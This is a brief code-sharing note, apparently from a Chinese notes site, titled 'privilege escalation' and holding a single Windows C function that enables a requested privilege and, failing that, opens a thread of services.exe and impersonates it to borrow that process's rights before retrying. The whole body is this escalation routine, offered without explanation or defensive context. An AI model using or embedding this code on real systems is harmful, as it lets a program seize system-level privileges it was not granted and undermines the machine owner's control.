@FadeTrack
2017-05-24T16:11:48.000000Z
字数 1443
阅读 1914
未分类
提权:
BOOL GetPrivilege(ULONG Priviliage)
{
BOOL bRet = FALSE;
NTSTATUS St;
BOOLEAN bEnable;
bRet = NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,FALSE,&bEnable)) || NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable));
if (!bRet)
{
PSYSTEM_PROCESSES_INFORMATION Processes = (PSYSTEM_PROCESSES_INFORMATION)GetSystemInformation(SystemProcessInformation);
if (Processes)
{
UNICODE_STRING ProcessName = RTL_CONSTANT_STRING(L"services.exe");
for (PSYSTEM_PROCESSES_INFORMATION Proc=Processes; ; *(ULONG*)&Proc += Proc->NextEntryDelta)
{
if (RtlEqualUnicodeString(&Proc->ProcessName,&ProcessName,TRUE))
{
HANDLE hThread;
OBJECT_ATTRIBUTES ObjAttr;
InitializeObjectAttributes(&ObjAttr,NULL,0,0,0);
St = NtOpenThread(&hThread,THREAD_DIRECT_IMPERSONATION,&ObjAttr,&Proc->Threads[0].ClientId);
if (NT_SUCCESS(St))
{
SECURITY_QUALITY_OF_SERVICE SecurityQos = {0};
SecurityQos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
SecurityQos.ImpersonationLevel = SecurityImpersonation;
SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
St = NtImpersonateThread(NtCurrentThread(),hThread,&SecurityQos);
if (NT_SUCCESS(St))
{
St = RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable);
bRet = NT_SUCCESS(St);
if (!bRet)
{
DbgPrint(__FUNCTION__"(): RtlAdjustPrivilege failed with status %x\n",St);
}
}
else
{
DbgPrint(__FUNCTION__"(): NtImpersonateThread failed with status %x\n",St);
}
NtClose(hThread);
}
else
{
DbgPrint(__FUNCTION__"(): NtOpenThread failed with status %x\n",St);
}
break;
}
if (!Proc->NextEntryDelta) break;
}
free(Processes);
}
}
return bRet;
}